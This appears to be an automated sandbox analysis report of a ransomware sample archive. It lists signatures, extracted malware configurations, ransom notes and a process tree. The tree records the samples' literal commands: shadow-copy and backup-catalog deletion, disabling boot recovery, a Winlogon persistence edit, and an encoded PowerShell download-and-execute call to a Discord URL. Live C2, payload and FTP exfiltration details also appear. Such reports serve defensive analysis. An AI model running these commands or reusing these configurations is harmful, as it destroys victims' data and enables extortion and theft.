Overview

overview

10

Static

static

1

RNSM00468.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    279s
  • max time network
    282s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 18:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00468.7z

  • Size

    103.3MB

  • MD5

    c2df2a193d75d2ebcdaaa803a9e02d2c

  • SHA1

    334668dc9d0cd98412cbe7c454080ec77bb840af

  • SHA256

    d5789e5e8acb837cf697c55826769bbe7ca8b537f74924452ef5451865a99887

  • SHA512

    90db54b7f56dba7f085315b9aa7c194aff19ec3f0650c578919be2fad93bc749e48fe427c0ff4b6a6aeeb49e26ef855f2fa0429767c90aa3fec788652806c107

  • SSDEEP

    3145728:e4rPS3CLAi1kjT2dM/aiCj/WPb+uX4lNzid:riK1+IKPylNWd

Score
10/10
agentteslaavoslockerchaosdjvugandcrabagilenetbackdoorcollectioncredential_accessdefense_evasiondiscoveryevasionexecutionimpactkeyloggerpersistencepyinstallerransomwarespywarestealertrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/880265796767608892/882377555729063987/New_Text_Document.txt

Extracted

Family

djvu

C2

http://astdg.top/fhsgtsspen6/get.php

Attributes
  • extension

    .hoop

  • offline_id

    922IaqlBU1I6IKX6eTDABuH3amHHwoa5qUSb8vt1

  • payload_url

    http://securebiz.org/dl/build2.exe

    http://astdg.top/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-I6qIbIYiz9 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0326gDrgo

rsa_pubkey.plain

Extracted

Path

C:\Users\Default\Saved Games\GET_YOUR_FILES_BACK.txt

Family

avoslocker

Ransom Note
Attention! Your files have been encrypted using AES-256. We highly suggest not shutting down your computer in case encryption process is not finished, as your files may get corrupted. In order to decrypt your files, you must pay for the decryption key & application. You may do so by visiting us at http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion. This is an onion address that you may access using Tor Browser which you may download at https://www.torproject.org/download/ Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website. Contact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly. The corporations whom don't pay or fail to respond in a swift manner can be found in our blog, accessible at http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion Your ID: 3276b4d5d73dc9de228691c8193c374f5c83ba83341cf9405130e0095f60437b
URLs

http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion

http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion

Extracted

Path

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\ReadMe.txt

Ransom Note
Gentlemen! Your business is at serios risk . There is a significant hole in the security system of your company. We have easily penetrated your network. You should thank the Lord for being hacked by serios people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. All files on each host in the network have been encrypted with a strong algorithm Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannoDecryptor etc. repair tools Are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet ) and attach 2 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc. )) You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We dont need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. Contact emails Primary email : [email protected] Secondary email : [email protected]

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.hdconstruct.ro/
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    Z7p[d6+Oe!0i^C85CQ]uD68jNN@ossy~wH-(ie^9O2(0011

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

    ransomwareavoslocker
  • Chaos

    Ransomware family first seen in June 2021.

    ransomwarechaos
  • Chaos Ransomware 4 IoCs
  • Detected Djvu ransomware 13 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • GandCrab payload 2 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • AgentTesla payload 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (164) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (171) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (71) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 14 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 37 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 43 IoCs
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00468.7z
    1⤵
    • Modifies registry class
    PID:1856
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4436
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3472
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00468.7z"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
          HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4352
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            PID:7060
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
                PID:468
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  6⤵
                  • Interacts with shadow copies
                  PID:7048
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  6⤵
                    PID:5632
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  5⤵
                    PID:5476
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      6⤵
                      • Modifies boot configuration data using bcdedit
                      PID:6004
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled no
                      6⤵
                      • Modifies boot configuration data using bcdedit
                      PID:6772
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                    5⤵
                      PID:6744
                      • C:\Windows\system32\wbadmin.exe
                        wbadmin delete catalog -quiet
                        6⤵
                        • Deletes backup catalog
                        PID:6576
                    • C:\Windows\system32\NOTEPAD.EXE
                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt
                      5⤵
                      • Opens file in notepad (likely ransom note)
                      PID:7528
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
                  HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1152
                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                    "C:\Users\Admin\AppData\Roaming\svchost.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:6524
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:740
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3392
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3188
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3244
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4740
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2856
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3496
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4220
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1376
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
                    4⤵
                    • Blocklisted process makes network request
                    PID:5608
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2808
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:700
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
                  3⤵
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:3584
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:672
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:5888
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
                      5⤵
                      • Modifies WinLogon for persistence
                      • System Location Discovery: System Language Discovery
                      PID:5856
                  • C:\Users\Admin\AppData\Roaming\MAINPROC.exe
                    "C:\Users\Admin\AppData\Roaming\MAINPROC.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:7280
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4180
                  • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                    "C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe"
                    4⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • System Location Discovery: System Language Discovery
                    • outlook_office_path
                    • outlook_win_path
                    PID:6800
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
                  HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3508
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                  HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1820
                  • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                    HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:5596
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
                  HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5716
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
                  HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5928
                  • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
                    "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5736
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                  HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  PID:5844
                  • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                    HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                    4⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • System Location Discovery: System Language Discovery
                    PID:7816
                    • C:\Windows\SysWOW64\icacls.exe
                      icacls "C:\Users\Admin\AppData\Local\2e5a1121-e777-444f-89f1-76f96316f33c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                      5⤵
                      • Modifies file permissions
                      • System Location Discovery: System Language Discovery
                      PID:6644
                    • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                      "C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe" --Admin IsNotAutoStart IsNotTask
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      PID:6572
                      • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                        "C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe" --Admin IsNotAutoStart IsNotTask
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:7616
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe
                  HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe
                  3⤵
                  • Drops startup file
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  PID:6092
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00468\HEUR-T~1.BAT
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:7736
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-6c64967a5a1bc4c23f94bcca28f8432df1691ebd1c82dda5a55af98b28c7473c.exe
                  HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-6c64967a5a1bc4c23f94bcca28f8432df1691ebd1c82dda5a55af98b28c7473c.exe
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  PID:6044
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe
                  HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe
                  3⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:6016
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptor.gen-bd88d415032eb24091c352fc0732b31116f44a78d9333037bd7608289608d3cd.exe
                  HEUR-Trojan-Ransom.Win32.Cryptor.gen-bd88d415032eb24091c352fc0732b31116f44a78d9333037bd7608289608d3cd.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:6004
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe
                  HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5984
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" vbscript:msgbox("升级前请确认已经重启过电脑,辅助也已经退出,如遇升级失败,请重启电脑后再操作一次 @A神优化 简单好用",64,"A神优化")(window.close)
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:8096
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-90aef1f9699429468854159767b2278891c931d9ceb3566b80d20d1b36678ccf.exe
                  HEUR-Trojan-Ransom.Win32.Encoder.gen-90aef1f9699429468854159767b2278891c931d9ceb3566b80d20d1b36678ccf.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2272
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe
                  HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5016
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 396
                    4⤵
                    • Program crash
                    PID:6452
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Generic-13b27fe50d1a3dfaccc45fc80c4eaa4e1ec4ba16486266be1470b35d85ccd905.exe
                  HEUR-Trojan-Ransom.Win32.Generic-13b27fe50d1a3dfaccc45fc80c4eaa4e1ec4ba16486266be1470b35d85ccd905.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
